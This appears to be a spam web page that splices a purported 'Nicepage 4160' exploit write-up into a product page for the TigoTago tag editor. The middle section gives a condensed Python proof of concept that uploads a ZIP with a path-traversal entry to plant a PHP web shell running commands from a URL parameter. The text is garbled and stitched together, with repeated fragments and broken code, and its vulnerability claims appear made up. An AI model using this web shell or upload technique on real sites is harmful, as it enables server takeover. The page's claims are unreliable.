tag editor

Nicepage 4160 Exploit Upd -

supports MP3, FLAC, M4A, AVI, WAV, WMA, APE, MPC, AAC, OGG - freedb & discogs

TigoTago - tag editor

TigoTago ® is a spreadsheet-based tag editor for media files. This enables you to easily set and modify tags and to rename a huge number of files. Convenient multi-selection allows for flexible mass taging and mass renaming operations. You have full control - all changes are visible before you save them to disk. No typing will be needed when filling tags, since they can by imported from freedb or Discogs on-line databases.

System requirements

Nicepage 4160 Exploit Upd -

Before diving into the exploit, we must understand the target. Nicepage is a popular website builder used by over 2 million users. It functions both as a WordPress plugin and a standalone HTML/CSS generator. Version 4.16 (build 4160) was released in mid-2023, introducing new dynamic grid systems and form handlers.

The vulnerability: Security researchers (alias: Dr.Web) flagged that version 4.160 (internal build 4160) contained a flawed sanitization routine inside the ajax_form_action handler.

Exploits can lead to a range of malicious outcomes, including: nicepage 4160 exploit upd

The updated exploit uploads a ZIP containing a shell.php with a path like:
./templates/malicious/../../../../shell.php

Steps:

Python PoC (condensed):

import requests, zipfile, io

z = io.BytesIO() with zipfile.ZipFile(z, 'w') as zf: zf.writestr('../../../../shell.php', '<?php system($_GET["cmd"]); ?>') Before diving into the exploit, we must understand

r = requests.post('http://target.com/api/template/import', files='file': ('exploit.zip', z.getvalue())) print(r.status_code)


NicePage is a user-friendly website builder that allows users to create professional-looking websites without needing to learn complex coding languages. Its drag-and-drop functionality and a wide range of templates make it a popular choice for individuals and businesses looking to establish an online presence.

Download

TigoTago 2.2 [8.2 MB] - tag editor

TigoTago 2.2 Package [37 MB] - tag editor with .NET Framework 2.0 and Windows Media Format 9 Series Runtime

Available languages

Screenshots

albums view

TigoTago albums view

tracks view

TigoTago tracks view

Dircectory / file name column and pop menu available on each cell.

popup menu

inplace editor on each cell like in a spreadsheet,
preview changed cells before save to disk (orange),
convenient multi-select (blue):

grid multi-selection and preview changes

complete set of operations on tags:

tags operations

More screens available in the Help.

© 2004-2012 Yoplo.com